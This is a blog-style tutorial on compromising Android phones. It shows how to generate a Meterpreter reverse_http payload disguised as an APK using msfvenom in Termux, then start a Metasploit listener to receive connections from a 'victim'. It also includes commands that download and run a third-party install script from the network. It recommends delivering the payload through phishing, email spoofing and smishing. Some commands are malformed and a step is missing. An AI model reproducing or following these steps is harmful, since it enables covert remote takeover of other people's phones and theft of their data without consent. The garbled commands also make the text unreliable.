There are several methods to hack a computer system like installing any kind of trojan, backdoor or finding a vulnerability into the system. All these attacks are the same for any mobile phone to whether it’s an android phone or ios and if the victim is still using windows phone then there are two things that are done. First, there is no software update available for windows phone that means it’s vulnerable and the second thing is to tell the person please upgrade. As per the google, more than 60-70% people are using android and rest of all is for ios and windows phone. So basically android has a huge market share, As I explained there are soo many methods to hack a computer system or mobile phone.
To hack any system you need a computer with any operating system but Linux is the best operating system for hacking purpose.
In this tutorial i will show to how to create a basic payload for android mobile to hack it without any computer, To do that you just need to install TERMUX from the play store and need to install some packages to become a root user, I have already explained how to install termux and configure it in your android in phishing with android tutorial. You can check it out to configure your termux to become a root user.
How to Install Metasploit In Termux
Now, as soon as you complete installing termux and configure it you need to install a very powerful tool called Metasploit. If you don’t know what is Metasploit then Metasploit is a tool used to cybersecurity experts for pentesting purpose. To install the Metasploit in termux type the following command in your termux
1. apt-get update
2. apt-get upgrade
3. apt-get install wget
4. wget https://Auxilux.github.io/metasploit.sh
5. cd Home
6. bash Metasploit.sh
Once the Metasploit is successfully installed you can the android payload with the following command in your termux.
msfvenom -p android/meterpreter/reverse_http lhost=your IP lport 8080 r> application name.apk
lhost = your local IP address, you can check your IP address just by typing ifconfig in termux
r> = name the payload application name with .apk for android
once you are done with this you can check the payload by typing the “ls” command in the termux.
Now when you have successfully created a payload you can start the Metasploit listener to create a session with the target mobile, to do that just type the following command
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_http
4. set lhost= (your IP)
5. set lport=8080
When you type the exploit, Metasploit will start a connection from your mobile. now once you are done with all the steps, you have to send the payload which we created earlier to the victim, once your victim installs it in his phone you will get the connection from his/her mobile. there can be soo many different ways to send a payload to the victim like phishing link, email spoofing, smishing, and social engineering and many more. it all up to you.
* if you get any error while installing the Metasploit you can comment down below, most people find it difficult to install Metasploit. you can comment down if you get any kind of error.